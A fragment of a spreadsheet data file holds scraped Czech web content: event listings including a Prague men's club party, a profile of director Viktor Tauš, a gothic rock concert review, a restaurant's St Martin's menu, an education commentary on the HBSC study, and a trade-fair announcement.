    <t>BIGGER 37: Grow Your Mo Bro- Praha - Heaven club- Praha Praha (okres Praha ) 1490 Kč Informace Obsah VIP balíčků: Super Ultra Hyper Mega VIP Soundcheck Balíček Jedna vstupenka na stání NEBO jedno z nejlepších míst k sezení Vstup na zvukovou zkoušku před koncertem Dřívější vstup do ...více Út (okres Praha ) 1490 Kč JACOB COLLIER DJESSE UK &amp;amp; EUROPE TOUR 12. 11. 2024 - Praha , O2 universum Pětinásobný držitel Grammy, zpěvák, skladatel, multiinstrumentalista a producent Jacob Collier oznamuje své dosud největší evropské turné...více Út (okres Praha ) 1290 Kč Childish Gambino The New World Tour Multitalentovaný Childish Gambino: poprvé a možná i naposled v pražské O2 areně! Na co sáhne, to promění ve zlato. Donald Glover aka Childish Gambino se vrací na koncertní pódia. Čtyřn&amp;amp;aac...více Út (okres Praha ) 490 Kč Letošní poslední pražský koncert slovenského hudebníka Maoka proběhne v impozantních prostorách kostela sv. Šimona a Judy. Dopřejte si chvíle relaxace, odpočinku a snění. Vezměte své přátele a přij ...více Út (okres Praha ) 290,- Hudební skupina Lili Marlene je autorským projektem klávesisty a kapelníka Martina Němce (Precedens), který by se snad dal nazvat "futuristickým šansonem". Seskupení vévodí expresivní alt zpěvačky Dáši Součkové, která mimo jiné slavila před časem úspěch u publika i kritiky p ...více Út (okres Praha ) 470,- Populární talk show 7 pádů Honzy Dědka míří do Švandova divadla, kde se tak každý týden můžete těšit na dvě hodiny zábavy se známými a zajímavými osobnostmi. Pořad vznikl počátkem roku 2011 a do dnešního dne se v něm již vystřídalo na 600 hvězdných hostů. Rozhovory ...více St (okres Praha ) 1110 Kč THE DEAD DAISIES se proslavili svou vytrvalou snahou o „omlazení“ klasického rocku, kterou zahájili před více než deseti lety. Kapela vznikla s cílem vnést nadčasového ducha rocku 70. let do moderní hudby a při její...více St (okres Praha ) 730 Kč VOLA oznamují tour "Friend of a Phantom Europe Tour 2024", na kterém se zastaví i v Praze . Tento dánsko-švédský kvartet je známý svým inovativním přístupem k progresivnímu metalu a svou chara...více St (okres Praha ) 379 Kč Jakub Děkan , jeden z nejvýraznějších umělců a hitmakerů své generace se chystá oslavit 10 let na scéně na podzimním tour! 19:00 open 20:00 Patrik Malý 21:00 Jakub Děkan St (okres Praha ) 590 Kč Deloraine zahrají plný a dlouhý koncert, ve kterém slyšíte všechny důležité skladby od kultovních písní jako Zaklínač, Lazare nebo Yennefer, přes vše důležité z alba Srdce z kamene, až po žha...více St (okres Praha ) 490 Kč SWMRS je bratrská kapela z Kalifornie . Založili ji zpěvák a kytarista Max a Cole Beckerovi, když byli sotva teenageři, a během let si díky svému punkovému zvuku, chytlavým písním a výbušné živé show vyp ...více St (okres Praha ) 300,- Dvě kapely, které spojuje letité přátelství, se rozhodly si udělat radost společným turné. Přidejte se, příjďte a udělejte si taky radost.Začátky hradeckých TERNE ČHAVE sahají do 80.let minulého století (:O) a prošli si cestou od akustického romského folku k současné výb...více St (okres Praha ) 500 Kč Benefiční koncert pro děti s golfovou nohouZastavte se v předadventním čase a dopřejte si nevšední hudební zážitek.Světoznámá operní pěvkyně Andrea Kalivodová a její klavírní doprovod připomenou slavné melodie. Britsko-italský zpěvák Daniel Zappi doplní hudební večer&amp;amp;nb...více St (okres Praha ) 300 Kč Štěpán Urban , český hudebník a songwriter, se chystá na své první turné, na které vyráží již tento podzim. Přijďte si poslechnout jeho debutové album Potopa, které vás pohltí hlubokými texty a širokým spektrem nálad, zvuků a příběhů.Štěpánova hudba vás zavede n...více St (okres Praha ) 850,- Přijměte pozvání na 2. Fakultní elektrovalčík! Oficiální reprezentační ples Fakulty elektrotechnické ČVUT se uskuteční 13. listopadu 2024 v Empire Hall ve Slovanském domě v Praze. Těšit se můžete na večer plný tance a zábavy, který doprovodí živá hudba big bandu Great Win...více St (okres Praha ) 250,- Jiří Dědeček si po svém oslaví 35. výročí Sametové revoluce. Zazní písničky z druhé půle osmdesátých let, které listopadu 89 předcházely, ale i ty, které těsně následovaly. Zároveň proběhne křest audioknihy Snídaně se psem. Čt (okres Praha ) 550,- Speciální výroční koncert a velkolepá oslava 22. narozenin proběhne 14. listopadu ve velkém sále Paláce Lucerna. Dítě do 10 let (včetně). Pro ověření věku může být požadován doklad (kartička poji...více Čt (okres Praha ) PINS &amp;amp; KNUCKLES FACES OF DEATH TOUR 2024: VEIL OF MAYA, SIGNS OF THE SWARM, VARIALS, TO THE GRAVE Faces Of Death Tour 2024: Smršť polyrytmických kytar a pronikavých vokálů deathcorových Veil of Maya, kteří dovezou svou sedmou desku [m]other. Pi...více Čt (okres Praha ) 580 Kč MASTER BOOT RECORD je hlavní spouštěcí záznam, který je v počítačích umístěn v prvním sektoru pevného disku, tj. na jeho úplném začátku. Je to zavaděč operačního systému, kter&amp;amp;eacu...více Čt (okres Praha ) 790 Kč Indie miláčci minulé dekády, které objevila i Gen Z: Cults vystoupí poprvé v Praze Americká nezávislá scéna si Cults oblíbila, jen co v roce 2011 vydali svůj eponymní debut. K tomu jim pomohla i prestižn&amp;amp;ia...více &amp;lt;&amp;lt; &amp;lt; 1 2 3 4 5 6 7 8 9 10 11 12 &amp;gt; &amp;gt;&amp;gt; Popis kulturní akce BIGGER 37: Grow Your Mo Bro- Praha CZ Men clubbing party Datum: 1.11.2024 Čas: od 20:00 Vstup předprodej / presale tickets: 100,-Kč nebo na místě / on door: 200,-Kč v ceně zdarma šatna &amp;amp; drink podle vlastního výběru included cloakroom &amp;amp; one drink for free 20:00 – VIP vstup 21:00 – 22:00 Warm Up (30% happy hours) 22:00 – 05:00 Men clubbing party Special club party for Bears / Rubber / Puppies / Leather Men clubbing dance party Bigger Praha je aktuálně jediná párty v Evropě nominovaná v soutěži Bear World Magazine Awards 2024 na Best Bear Club night 2024! Párty pro ty, co mají odvahu. Nebuď za slušňáka! Užij si zábavu a obleč se vyzývavě a tolik fetiš, jak jen je možné! Pokud se cítíš dobře ve společnosti medvědů a chlapů, nezáleží na tom, jestli jsi gay, twink, hetero, transgender, nebinární, fluidní nebo queer: jsi vítán. Dresscode není vyžadován. Dance floor Kuřárna Playrooms zona Chill zona Houpačka Čepované pivo Těší se na vás: barmani: Adam &amp;amp; David DJ Peasant DJ Paw.l EN Party for those who have guts. ✔ Don’t be a good guy! Attend the event wearing as kinky and fetish as possible! ✔ Leather, rubber, neoprene, jockstrap, harness, human or animal costumes, make-up, extravagance … ✔ Gainer friendly event ✔ Drescode not required Venue ✔ Bar &amp;amp; Floor ✔ Draft Beer ✔ Indoor Smoking Area ✔ Lockers ✔ Playrooms ✔ Sling O nás Prodej vstupenek na koncerty, festivaly, do divadel, na sportovní akce, akce pro děti a na další kulturní akce. Provozovatel Provozovatel stránek www.kultura365.cz funguje jako zprostředkovatel (zobrazovatel) služeb nabízených tímto serverem, a nenese odpovědnost za poskytnutí služeb nebo jejich kvalitu třetí stranou. Provozovatel není poskytovatelem těchto služeb. Provozovatel nenese žádnou odpovědnost za ceny, termíny a informace zobrazené na těchto stránkách. Nabídka Autor: info@kultura365.cz</t>
  </si>
  <si>
    <t>20241101_65_3264632859_f4b54e7f0833f796d7bf.html</t>
  </si>
  <si>
    <t>f4b54e7f0833f796d7bf</t>
  </si>
  <si>
    <t>Viktor Tauš: Lamač ženských srdcí o kterém se nyní mluví.Vstal ze dna a natočil životní příběh</t>
  </si>
  <si>
    <t>Viktor Tauš : Lamač ženských srdcí o kterém se nyní mluví.Vstal ze dna a natočil životní příběh Režisér Viktor Tauš přináší silný příběh dívky z dětského domova. Životní osud takzvané Amerikánky, která navzdory těžkému startu do života našla svou cestu, ho fascinuje už více než 25 let. Jméno Viktora Tauše v posledních dnech zaznamenal snad každý, kterého zajímá film. Kdo je ale režisér dlouho očekávaného snímku Amerikánka? Je to kdysi bývalý bezdomovec a narkoman, který se dokázal zvednout ze samotného dna a stát se lamačem všech ženských srdcí. Je to jen několik dnů, co do kin zamířil film Amerikánka režiséra Viktora Tauše . Nejenže svým stylem vyprávění nemá v naší kinematografii srovnání, ale režisér Tauš na něm pracoval téměř pětadvacet let a vychází ze skutečného příběhu ženy, která prošla dětským domovem i pasťákem, aby nakonec skončila na ulici. A právě tam se potkala s Viktorem , a změnila jeho život. Poměrně často utíkal z domu Sám byl totiž tehdy na úplném dně a nebylo mu dobře. Životní příběh rodáka z Prahy je podobně poutavý jako osud filmové Amerikánky. Jeho tatínek byl workoholik a maminka holdovala alkoholu . A tak malý Viktor poměrně často utíkal z domu, protože tam nechtěl trávit svůj čas. Po maturitě byl přijatý na FAMU , jenže divoká devadesátá léta se promítla i do jeho života a on spadl do závislosti na heroinu. Z drog se díky léčbě dostal a následně se pustil do natáčení autobiografického snímku Kanárek. Ten byl sice umělecky oceněný, ale komerčně neúspěšný. A Viktorovi zůstaly na krku dluhy, kvůli kterým znovu sáhl po návykových látkách. Nakonec skončil na ulici, kde živořil téměř dva roky. Kdoví, jak by to s ním dopadlo, kdyby v té době nepotkal Amerikánku, tedy ženu, jejíž osud je předobrazem filmového příběhu. Právě ona mu totiž dodala odvahu začít znovu. „Každé ráno jsem si vypral prádlo u jezu pod Jiráskovým mostem a šel si hledat práci. Vzali mě v reklamní agentuře,“ popsal pro Heroine . Životní dílo chystal dlouhé roky Patnáct let se zabýval tím, jak příběh zpracovat, a celé ty roky sháněl peníze. Mezitím se mu povedlo vytvořit stejnojmennou divadelní hru, kterou v divadle Jatka78 shlédlo víc než sto tisíc diváků. Ovšem nejen díky ní na sebe Tauš celá léta upozorňoval. Vždy se o něm hovořilo jako o lamači ženských srdcí. Už během manželství s herečkou Evou Jeníčkovou (60) měl aféru s Klárou Melíškovou (52) a tokal třeba i s Lenkou Krobotovou (47). Nyní chodí s tanečnicí Kristínou Tukan (32) a říká o ní, že je to konečně ta pravá. Snad tomu tak tentokrát opravdu je. A snad se bude dařit i snímku, který nyní míří na zahraniční festivaly. Otvírá totiž palčivé téma dětských domovů a důležitosti rodiny. Na premiéru dorazily i děti z dětských domovů, které si ve filmu zahrály. Malou Amerikánku si zahrála tehdy devítiletá Klára Kitto. Zdroje: https://www.csfd.cz/tvurce/34296-viktor-taus/prehled/ https://www.heroine.cz/kultura/na-zivot-na-ulici-vzpominam-strasne-rad-rika-reziser-viktor-taus-film-amerikanka-vznikl-z-prodlouzeneho-detstvi https://www.seznamzpravy.cz/clanek/kultura-taus-deti-na-ulici-jsou-obrovske-a-neresene-trauma-nasi-spolecnosti-261410</t>
  </si>
  <si>
    <t>20241101_650_3239750874_259f339a5bdbead49866.html</t>
  </si>
  <si>
    <t>259f339a5bdbead49866</t>
  </si>
  <si>
    <t>GOTHIC IGLAU - 19.10.2024, Jihlava, DKO Jihlava</t>
  </si>
  <si>
    <t>GOTHIC IGLAU - 19.10.2024, Jihlava , DKO Jihlava Čistě gothic rockových akcí je u nás jako šafránu, a proto když už se nějaká objeví, neváhají na ní dorazit příznivci temného žánru z celé republiky. Naštěstí má Jihlava skvělou geografickou polohu, takže ani z těch nejzapadlejších koutů naší vlasti to na Vysočinu není daleko. Hlavním lákadlem letošního ročníku Gothic Iglau nebyla jen tři živá vystoupení tuzemských souborů, ale především premiéra druhého dílu dokumentárního filmu o Petru Štěpánovi s názvem „Světec z pekla 2“, kterou o frontmanovi kapely XIII. století natočil jeho velký obdivovatel a kamarád R.X.Thámo (Bratrstvo Luny). Kdo viděl první díl tohoto nevšedního dokumentu, dá mi za pravdu, že nechat si ujít jeho pokračování prostě nešlo. Navíc v tuto chvíli vůbec není jisté, jestli jeho veřejná premiéra nebyla zároveň jeho derniérou (doufejme, že ne). "Světec z pekla 2" začíná přesně tam, kde končil první díl a nese se ve stejném duchu. Opět na základě rozhovorů se zainteresovanými osobami utváří obraz o životě Petra Štěpána , přičemž se ho nesnaží jakkoliv glorifikovat ani adorovat. Jeho cílem je nahlédnutí do soukromí výjimečného umělce a zmapování Petrovy hudební kariéry. Film obsahuje několik emočně vypjatých momentů i úžasně komických situací. Dvojice tvůrců (režisér R.X.Thámo a kameraman Jan Hrušovský ) odvedla fantastickou práci a odměnou jim byl několika minutový aplaus ve stoje do posledního místa zaplněného kinosálu DKO Jihlava . Doufejme, že se prostřednictvím fundraisingové sbírky podaří vybrat dostatek prostředků, aby bylo možné oba díly filmu distribuovat k fanouškům, protože "Světec z pekla" si to rozhodně zaslouží. Následně se dění přesunulo do hlavního sálu, v němž sérii živých vystoupení odstartoval Projekt XIII, relativně nová formace bývalého frontmana Bratrstva Luny Matěje Lipského . Vnuk slavného herce a v civilním životě uznávaný psycholog je vskutku renesančním člověkem a možná trochu nedoceněnou osobností domácí rockové scény. Sleduji jeho hudební pouť už od dob death metalové Masturbace a nepřestává mě svým hudebním vývojem překvapovat. Projekt XIII je v porovnání s Matějovými předchozími působišti uhlazenější, poklidnější a přístupnější širšímu publiku, ale gotická aura mu nechybí a dokáže zaujmout mimo jiné střídáním českých a anglických textů. Kapela má čerstvě venku nahrávku „Dark Energy“, kterou ji v Jihlavě přišli pokřtít Pavel Štěpán a Míra „Palda“ Paleček z XIII. století. Publikum si první živé vystoupení večera viditelně užilo, a i když musím dodat, že mě Matějovy předešlé kapely bavily o něco víc, předvedl Projekt XIII v nezáviděníhodné pozici prvního účinkujícího večera důstojné vystoupení. Moderátor akce Petr Korál uvedl druhého vystupujícího jako českou gothic rockovou legendu. Já bych spíše hudbu jihočeské formace Jerusalem popsal jako směs AOR a posmutnělého popíku. Jejich set mě ani trochu nebavil a korunu tomu nasazoval zpěvák neustálým vykřikováním „hej, hej“, které se do zasněné a pochmurné hudby kapely ani trochu nehodilo. Své publikum Jerusalem v sále našel a ve finále sklidil přibližně stejný divácký ohlas jako Projekt XIII. Nálada se okamžitě zvedla, když odbila půl jedenáctá a na pódiu stanula ikona domácího gotického rocku - kapela XIII. století. Jihlavská čtveřice má čerstvě venku album „Noc vlků“, které bylo před domácím publikem potřeba pokřtít. Role kmotra se ujal hudební publicista Petr Korál a pokropil cédéčko místním pivem . Z novinky kapela zahrála dvě věci „Ze stromů listí už padá“ a „Můj bratře můj“, přičemž druhá se dočkala nečekaně vřelého přijetí, což mě utvrdilo v názoru, že XIII. století na nové desce stvořilo další koncertní tutovku. Kapela už má na kontě tolik hitů, že propašovat do setlistu nějaké překvapení je zhola nemožné. Zbytek programu tvořily v podstatě povinné položky, bez kterých si koncert Třináctky nelze představit. Je možná zbytečné dodávat, že „Fatherland“, „Transylvanian Werewolf“, „Upír s houslemi“, „Justina“, „Karneval“, „Elizabeth“ a závěrečnou baladu „Růže a kříž“ odzpívalo s kapelou sborově publikum, to už je v podstatě tradice. Petr Štěpán přes skoro důchodový věk stále skvěle zbývá a není poznat, že by se na jeho hlase zub času nějak výrazněji podepsal. Kapela šlape jak švýcarské hodinky a před domácím publikem podala skvělý výkon. Když si položím otázku, zda stálo za to absolvovat kvůli Gothic Iglau více než stokilometrovou cestu do Jihlavy , bez váhání odpovím „rozhodně ano!“. Playlist XIII. století: Fatherland, Transylvanian Werewolf, Ze stromů listí už padá, Frankenstein, Faust, Upír s houslemi, Můj bratře můj, Justina, Karneval, Evropa , Elizabeth, Růže a kříž Autor: Moloch</t>
  </si>
  <si>
    <t>4040</t>
  </si>
  <si>
    <t>2190</t>
  </si>
  <si>
    <t>20241101_651_3239762261_9274d25e2d24fa9aff1b.html</t>
  </si>
  <si>
    <t>9274d25e2d24fa9aff1b</t>
  </si>
  <si>
    <t>Gurmánský tip: Svatomartinské menu Marka Fichtnera v restauraci Červený Jelen</t>
  </si>
  <si>
    <t>Gurmánský tip: Svatomartinské menu Marka Fichtnera v restauraci Červený Jelen 11. listopad dávno není jen svátkem Martinů či Martínků, ale všech milovníků dobrého jídla a pití. Svatomartinské hody patří k jedné z nejoblíbenějších tradic, kterou podle historických pramenů slavíme už od 15. století a možná ještě déle. K místům, kam se v listopadu můžete vydat na prvotřídní svatomartinské menu, jemuž dle zvyklostí dominuje husa, už několik let patří restaurace Červený Jelen v centru Prahy . „ U nás v Červeném Jelenovi připravujeme tradiční svatomartinské menu s moderním nádechem. Hostům servírujeme klasiku, jakou je tradiční kaldoun nebo v celku pečená husa, a také jemnou husí paštiku s arónií a rakytníkem nebo konfitované husí stehno s červeným zelím s pomerančem a badyánem. Příjemnou sladkou tečkou jsou moderně pojaté buchtičky s povidly na husím sádle s rumovou omáčkou,“ upřesňuje šéfkuchař restaurace Červený Jelen Marek Fichtner . Svatomartinské hody v restauraci Červený jelen vypuknou 8. 11. a potrvají do vyprodání zásob. A jaké delikatesy se budou podávat? Kaldoun s nudlemi, drúbky, zeleninou a pivním rohlíkem?- Husí paštika s arónií, rakytníkem, portským vínem a semínkovými krekry?- Celá pečená husa cca 3 kg (pro 4-5 osob) s vídeňským knedlíkem, bramborovými noky se strouhankou z briošky, červeným zelím s pomerančem a badyánem a kořenovou zeleninou konfitovanou v kachním sádle – tento chod pouze na předobjednávku. Konfitované husí stehno 400 g, s vídeňským knedlíkem, bramborovými noky se strouhankou z briošky, červeným zelím s pomerančem a badyánem a kořenovou zeleninou konfitovanou v kachním sádle?- Buchtičky s husím sádlem a povidly s rumovou omáčkou. O restauraci Červený Jelen Restaurace Červený Jelen vznikla v roce 2019 podle projektu architekta Stanislava Fialy v prostorech bývalé Anglicko- československé banky navržené českým architektem Josefem Gočárem . Nachází se v pražské Hybernské ulici v barokním Swéerts-Sporckově paláci, jehož původním majitelem byl hrabě Špork, zakladatel českého myslivectví, řádu sv. Huberta a donátor umění. K jeho zálibě v myslivectví odkazuje nejen název restaurace, ale také sochy létajících červených jelenů z dílny českého sochaře Michala Gabriela . Restaurace Červený Jelen propojuje krásnou gočárovskou „modernisticko-funkcionalisticko-kubistickou“ achitekturu, vřelý a pohostinný servis, kvalitní výběr nápojů a moderní pojetí gastronomie založené na citlivém mixu kvalitního grilovaného masa, zeleniny a la carte jídel od týmu pracujícího pod vedením známého šéfkuchaře Marka Fichtnera. Červený Jelen &amp;amp; Trezor Špork Autor: Miroslav Vaněk Autor person Miroslav Vaněk Rubrika transition_slide GASTRO &amp;amp; GURMÁN</t>
  </si>
  <si>
    <t>41</t>
  </si>
  <si>
    <t>20241101_652_3239750058_85a4592e27f77d1dc8a5.html</t>
  </si>
  <si>
    <t>85a4592e27f77d1dc8a5</t>
  </si>
  <si>
    <t>Lucie Kocurová: Země smutných dětí, které se netěší do školy. Proč je v Česku situace horší než jinde a jak z toho ven</t>
  </si>
  <si>
    <t>Lucie Kocurová: Země smutných dětí, které se netěší do školy. Proč je v Česku situace horší než jinde a jak z toho ven Štítky: výzkum a hodnocení Obrázek dětství, jak na něj často nostalgicky vzpomínáme, je plný radosti, smíchu, kamarádů a celkového pocitu štěstí. Jenže data ukazují, že to s tou radostí a štěstím u českých dětí už nějakou dobu není tak úplně žhavé. Zejména se to týká dětí na druhém stupni základní školy a nižším stupni víceletých gymnázií, a ještě ve větší míře dívek než chlapců. Nad tím, proč tomu tak je, a zda se s tím dá něco dělat, se v komentáři zamýšlí Lucie Kocurová. Zdroj: Heroine.cz 23.10.2024. Text vyšel s podporou Nadace České spořitelny . Nedávno zveřejnila Univerzita Palackého v Olomouci společně s Českou školní inspekcí data týkající se části dlouhodobé studie HBSC (Health Behaviour in School-Aged Children), ze které Česko vychází bez velkého přehánění tragicky. O co jde? HBSC je dotazníkové šetření, které se provádí od roku 1984 každé čtyři roky zhruba v padesáti zemích světa a Česko je jeho součástí už od začátku existence samostatného státu. Několik tisíc dětí ve věku 11, 13 a 15 let napříč třídami, školami a regiony vyplňuje podrobný dotazník, který se věnuje například tomu, jak často tyto děti pijí alkohol či slazené nápoje, kouří cigarety, užívají drogy, zda sportují a kdy chodí spát. Součástí šetření jsou i otázky týkající se vztahů v rodině, s vrstevníky a s učiteli. Zatímco si můžeme pogratulovat, že mezi dětmi klesá spotřeba alkoholu a cigaret a naopak narůstá konzumace ovoce, zeleniny a obyčejné vody, v oblasti vztahů pro Česko znamenaly výsledky studie studenou sprchu. Špatné klima ve školách Méně než desetina českých dětí se těší do školy, naopak čtyřicet procent z nich chodí do školy vyloženě nerado a tento poměr stoupá s věkem. V posledních čtrnácti letech navíc výrazně ubývá dětí, které by ke škole měly skutečně pozitivní vztah. Zatímco v roce 2010 mělo svou školu velmi rádo 16 procent dětí, v roce 2022 už to bylo jen osm procent. Ze 45 zemí, kde výzkumníci dětem pokládali tuto otázku, skončilo Česko na předposledním místě. Navíc se zjistilo, že za negativními emocemi dětí vůči škole nestojí přetížení z učiva, domácích úkolů a testů. Je pravda, že deváťáci se stresují z toho, co s nimi bude po přijímačkách. Napříč věkovými kategoriemi si děti stěžují, že často nechápou, proč se některé věci musejí učit a k čemu jim to v životě bude. V těchto pocitech jsme ale v rámci zúčastněných zemí okolo průměru. Proč se tedy mladí Češi netěší do školy? Na vině jsou chatrné vztahy a špatné klima, které ve školách panuje. V tomto ohledu se řadíme na smutnou poslední příčku ze všech zúčastněných zemí. Když to vezmeme po jednotlivých položkách, tak jen 37 procent chlapců a 30 procent dívek má pocit, že mají dobré vztahy se spolužáky, že se ve třídě rádi vidí a tráví spolu čas a jsou ochotní si navzájem pomoci. A co se týče učitelů, jsou výsledky asi nepřekvapivě ještě o dost méně veselé a opět – s věkem se zhoršují. V deváté třídě si už jen necelá třetina chlapců a pětina dívek myslí, že na nich jejich učitelům záleží jako na lidech a že se na ně mohou obrátit, když mají nějaký problém. Aby těch špatných zpráv nebylo málo, je potřeba dodat, že častěji se do školy těší děti z úplných rodin, které také víc cítí oporu ve svých spolužácích a učitelích. Což se dá také obrátit a číst tak, že když má dítě horší rodinné zázemí a vztahy s příbuznými, ve škole už svůj vztahový deficit nedožene. A nejde jen o tento jeden výzkum. Zhruba před rokem se v českých médiích hojně probíraly výstupy ze studie Národního ústavu duševního zdraví a České školní inspekce, podle nichž se v běžné deváté třídě základní školy o dvaceti žácích asi polovina psychicky necítí úplně nejlépe a z toho čtyři žáci se ubírají směrem k depresi a tři k úzkostem. Ve srovnání se zeměmi na západ od nás jde o zhruba dvojnásobná čísla, u dívek až trojnásobná. I mezinárodní srovnávací testy PISA dlouhodobě ukazují zhoršující se vztah mladých Čechů ke škole a pocit, že nemají oporu ve svých učitelích. Jak se z Česka stala země smutných a úzkostných dospívajících, kteří nemají rádi školu a nemají dobré vztahy s lidmi, kteří je obklopují? Po důvodech zhoršeného psychického stavu našich teenagerů ani jedna ze studií nepátrala, nicméně se asi dá usuzovat, že jde o jakýsi mix hormonálních změn, sociálních sítí a celospolečenského rozpoložení. Stačí se podívat do diskusí na internetu pod zpravodajskými články nebo třeba na Facebooku a je asi jasné, že zachovat si duševní zdraví v této zemi není jenom tak. Přičtěme si k tomu nedostatek míst na žádaných středních školách, cenově nedostupné bydlení, nedalekou válku, která přinesla inflaci a pocity ohrožení, přihoďte klimatickou změnu a je jasné, že dnešní děti mají řádně naloženo. Což by jistě potvrdili školní psychologové, dětští psychoterapeuti a pedopsychiatři – kdyby tedy nějací byli. Jak z toho ven? Není ale zas tak důležité, jak jsme se do této šlamastyky dostali. Důležitější je, jak se z ní vymotáme – a tady se už nemůžeme opřít o dotazníky. Někteří lidé se například domnívají, že současní dospívající jsou na tom psychicky a vztahově špatně, protože se jejich pocity příliš řeší, a oni proto „nic nevydrží“, což vynikne zejména ve srovnání s generacemi pravých tvrďáků – dnešních padesátníků a šedesátníků. Receptem těchto postarších konzervativců bývá model „malý dvůr a dlouhý bič“ neboli hodně učení a následně přísné testování. Učitel má být hlavně autoritou a vztahy mezi spolužáky je možné řešit, až se proberou všechna africká hlavní města a významné bitvy první světové války. Takže ideálně nikdy, protože škola je tu přece od předávání faktů a těch je prakticky nekonečné množství. Můžeme dát na hlasy postarších mudrlantů nebo se můžeme obrátit k vědě, konkrétně například k neurosekvenčnímu modelu fungování mozku, jehož autorem je americký psychiatr Bruce Perry . Ten tvrdí, že v lidském těle funguje systém odpovědí na stres, který se spouští, když nejsou naplněny naše primární potřeby nebo když se cítíme ohrožení. Při spuštění systému se aktivuje nejen naše tělo, ale i mozek a my se dostáváme do stavu boje, útěku nebo zamrznutí. To je velmi užitečné v momentu akutního ohrožení života, ale méně v běžných situacích, například při hodině ve škole. Mozek, který neustále reaguje na stres, pak zkrátka nemá kapacitu na absorbování nových poznatků. Ideální samozřejmě je, když se člověk během života naučí se stresem vyrovnávat, a stane se tak odolnějším. Jenže k tomu – kromě toho, že stres by měl být mírný, předvídatelný a zvládnutelný – je potřeba především opora v podobě kvalitních a blízkých vztahů, na které je možné se spolehnout. Když takové vztahy nemáme, je to všechno mnohem těžší, náš systém stresové reakce se stává čím dál citlivějším… a i to učení jde hůř. Víceméně to samé, jen trochu jednodušeji, už tvrdil i americký psycholog Abraham Maslow před nějakými osmdesáti lety, kdy sestavil a popsal svoji slavnou pyramidu potřeb. Také z té vyplývá, že abychom se mohli realizovat a něco nového se učit, musíme mít naplněné fyziologické i sociální potřeby; musíme se cítit přijímaní a v bezpečí. Dobré vztahy tedy nejsou nějaký zbytný luxus, na který můžeme pomýšlet, až když jsme všechno probrali, ale naopak základ, na němž teprve můžeme stavět kvalitní učení. A když nepomůže věda, můžeme zkusit ještě sáhnout po obyčejné lidské empatii. Tak schválně: jaké výkony asi podává zaměstnanec v práci, kam chodí nerad, nevidí v ní žádný smysl, šéf si sotva pamatuje jeho jméno a kolegové se tváří, že ho nevidí? Asi to nebude žádná sláva a dotyčný brzy začne zvažovat výpověď a hledání jiné práce. S takovým člověkem bychom asi soucítili a ve změně bychom ho podpořili. Proč ale totéž odmítáme chápat u dětí, které nakonec ještě mnohdy odmávneme jako sněhové vločky? Zdá se, že učit se – nikoli jen školní látce, ale právě empatii – potřebujeme my všichni. Autor: Učitelské listy Rubrika transition_slide výzkum a hodnocení</t>
  </si>
  <si>
    <t>20241101_653_3239780142_7768f45b4d096a7fb56e.html</t>
  </si>
  <si>
    <t>7768f45b4d096a7fb56e</t>
  </si>
  <si>
    <t>Veletrh FOR GASTRO &amp;amp; HOTEL 2024 představí nové technologie, produkty i nové talenty gastro oborů</t>
  </si>
  <si>
    <t>Veletrh FOR GASTRO &amp;amp; HOTEL 2024 představí nové technologie, produkty i nové talenty gastro oborů Vyhledávání by Vaněk Miroslav · 1. 11. 2024 Mezinárodní veletrh hotelového a restauračního zařízení, potravinářství a gastronomie FOR GASTRO &amp;amp; HOTEL se bude na podzim konat již počtrnácté. Jeho letošní ročník však bude mimořádný, premiérově se bude konat v souběhu s nejvýznamnější událostí cukrářského odvětví PRAGUE SWEET FESTIVAL. Proběhne v PVA EXPO PRAHA ve dnech 21. až 23. listopadu. Partnerem pro energetiku PVA EXPO PRAHA je společnost PKV Build s.r.o. Haly výstaviště PVA EXPO PRAHA se v listopadu promění v dějiště hned několika zajímavých gastronomických akcí, které potěší profesionály z odvětví HoReCa, ale také studenty gastro oborů nebo milovníky dobrého jídla, pití či sladkostí. Desítky expozic tuzemských i zahraničních značek představí nejnovější technologie, potraviny, nápoje, vybavení pro hotely, restaurace i cateringové společnosti, bistra, kavárny, cukrárny a další. Veletrh FOR GASTRO &amp;amp; HOTEL bude mít i soutěžního ducha, na své půdě totiž bude hostit hned několik prestižních soutěží. Jednou z nich je druhý ročník soutěže hledající perspektivní mladé talenty ENZO BENCINI BARISTA CUP 2024, kde budou soupeřit žáci ze středních hotelových škol. Pod hlavičkou SCA CZECH REPUBLIC se uskuteční mistrovství republiky minipražíren CZECH COFFEE ROASTING CHAMPIONSHIP 2024 a soutěž v kávové mixologii s alkoholem CZECH COFFEE IN GOOD SPIRITS. Pro svou školu mohou studenti vyhrát také pokladní systém společnosti Dotykačka . Dort roku i křty Letos opět nebude chybět carvingová soutěž CZECH CARVING CUP pro pokročilé i začínající řezbáře, kteří se mohou utkat ve čtyřech kategoriích. V rámci programu proběhne i křest nové kuchařky a nových školních učebnic a Vladimír Tůma představí učebnici stolničení. Na veletrhu FOR GASTRO &amp;amp; HOTEL budou k vidění technologie od společností Retigo, Unox, Jipa, Imeso spolu s ukázkami vaření a pečení známých kuchařů. Mezi novými vystavovateli je například značka Sony , jedenáct malých vinařství z Česka a Slovenska , Store Media a jejich sensory marketing nebo produkty značek Magniflex, Pfanner, LB Bohemia , Vodňanská drůbež a mnoha dalších. Bohaté vybavení do svých podniků zde naleznou i majitelé hotelů, a to v podobě značek Vector International , Ille papír hygiena a dalších. Profesionálové budou díky souběhu s PRAGUE SWEET FESTIVALEM návštěvníkům prezentovat i nové trendy a techniky cukrářských mistrů, proběhnou speciální workshopy a ochutnávky. Přijdou známí cukráři a pekaři, zájemci se mohou těšit například na Veroniku Besky, Mirku van Gils Slavíkovou či Vojtěcha Vrtišku s jeho kolegy z poslední série Peče celá země. Nebude chybět kouzlo populárních cukráren a možnost ochutnat lahodné speciality z kuchyní desítek vystavovatelů od čokolád, přes makronky, luxusní dezerty až ke kávě. Vyhlášen bude dort roku 2024 a uskuteční se klání v pečení vánočního cukroví. Událost nabídne také možnost výhodných nákupů nejen cukrářských pomůcek a surovin. Podrobnosti o obou akcích a plánovaných programech najdete na www.for-gastro.cz a www.praguesweetfestival.cz. Zdroj foto: Pixabay.com, Veletrh FOR GASTRO &amp;amp; HOTEL Letní scéna Galerie Harfa vstoupila do své druhé poloviny 4. 8. 2023 Autor: Miroslav Vaněk Autor person Miroslav Vaněk Rubrika transition_slide HOTELY &amp;amp; PENZIONY</t>
  </si>
  <si>
    <t>36</t>
  </si>
  <si>
    <t>22</t>
  </si>
  <si>
    <t>20241101_654_3239765721_9fb442b78dc6d71733db.html</t>
  </si>
  <si>
    <t>9fb442b78dc6d71733db</t>
  </si>
  <si>
    <t>„Už Martin na bílém koni, už zase přijíždí k nám …“</t>
  </si>
  <si>
